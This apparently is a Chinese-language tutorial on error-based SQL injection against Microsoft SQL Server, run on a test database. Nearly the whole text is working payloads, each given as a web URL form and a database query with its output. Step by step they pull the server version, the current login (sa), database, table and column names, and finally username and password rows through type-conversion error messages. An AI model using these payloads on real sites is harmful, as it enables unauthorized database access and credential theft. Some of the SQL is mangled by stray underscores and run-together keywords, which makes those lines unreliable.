0x00 测试数据
1> select * from article;2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 |+----+-----------+-----------+(2 rows affected)
# 测试表数据: users;sql server> select * from users;+----+--------------+----------+| id | username | password |+----+--------------+----------+| 1 | test-user-01 | 123456 || 2 | test-user-02 | 234567 |+----+--------------+----------+2 rows in set (0.00 sec)
sql server> SELECT system_user;+-----------------------+| field1 |+-----------------------+| sa |+-----------------------+1 row in set (0.00 sec)
sql server> select db_name();+-----------------------+| field1 |+-----------------------+| test |+-----------------------+1 row in set (0.00 sec)
0x01 爆数据库版本
web语句: http://www.test.com/sql.php?id=1 and 1=@@version
数据库语句: select * from _users _where id =1 and 1=@@version
1> select * from users where id=-1 and 1=@@version;2> go22018 - [SQL Server]在将 nvarchar 值 'Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)Sep 24 2019 13:48:23Copyright (C) 2019 Microsoft CorporationDeveloper Edition (64-bit) on Windows 10 Pro 10.0 <X64> (Build 17763: ) (Hypervisor)' 转换成数据类型 int 时失败。
0x02 爆当前连接用户
web语句: http://www.test.com/sql.php?id=1 and 1=system_user
数据库语句: select * from users where id=1 and 1=system_user
1> select * from users where id=1 and 1=system_user;2> go22018 - [SQL Server]在将 nvarchar 值 'sa' 转换成数据类型 int 时失败。
0x03 爆当前连接的数据库
web语句: http://www.test.com/sql.php?id=1 and 1=db_name()
数据库语句: select * from _users _where id =1 and 1=db_name()
1> select * from users where id=1 and 1=db_name();2> go22018 - [SQL Server]在将 nvarchar 值 'test' 转换成数据类型 int 时失败。
0x04 爆库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=1 and 1=db_name(1)
数据库语句: select * from _users _where id =1 and 1=db_name(1)
1> select * from users where id =1 and 1=db_name(1);2> go22018 - [SQL Server]在将 nvarchar 值 'master' 转换成数据类型 int 时失败。
1> select * from users where id =1 and 1=db_name(2);2> go22018 - [SQL Server]在将 nvarchar 值 'tempdb' 转换成数据类型 int 时失败。
0x05 爆表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1 and 1=(select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)
数据库语句: select * from users where id=1 and 1=(select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)
# 爆 1表1> SELECT*FROMusersWHEREid = 1AND 1 = (SELECTtable_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 1);2> go22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
# 爆 1表1> SELECT*FROMusersWHEREid = 1AND 1 = (SELECTtable_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 2);2> go22018 - [SQL Server]在将 nvarchar 值 'users' 转换成数据类型 int 时失败。
0x06 暴字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name=’要查询的表名’
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1 and 1=(select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1)
数据库语句: select * from users where id=1 and 1=(select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1)
# 获取当前库 users表 第一个字段名称1> SELECT*FROMusersWHEREid = 1AND 1 = (SELECTcolumn_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 1);2> go22018 - [SQL Server]在将 nvarchar 值 'id' 转换成数据类型 int 时失败。
# 获取当前库 users表 第二个字段名称1> SELECT*FROMusersWHEREid = 1AND 1 = (SELECTcolumn_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 2);2> go22018 - [SQL Server]在将 nvarchar 值 'password' 转换成数据类型 int 时失败。
0x07 爆内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1 AND 1 = (select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1)
数据库语句: SELECT FROM users WHERE id = 1 AND 1 = (select cast(a.id as varchar)+’|’+cast(a.username as varchar)+’|’+cast(a.password as varchar) from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1)
# 查询users表 第一条数据1> SELECT*FROMusersWHEREid = 1AND 1 = (SELECTCAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)FROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 1);2> go22018 - [SQL Server]在将 varchar 值 '1 |test-user-01|123456' 转换成数据类型 int 时失败。1>
# 查询users表 第二条数据1> SELECT*FROMusersWHEREid = 1AND 1 = (SELECTCAST (a.id AS VARCHAR) + '|' + CAST (a.username AS VARCHAR) + '|' + CAST (a.password AS VARCHAR)FROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 2);2> go22018 - [SQL Server]在将 varchar 值 '2 |test-user-02|234567' 转换成数据类型 int 时失败。
若有收获,就点个赞吧
0 人点赞
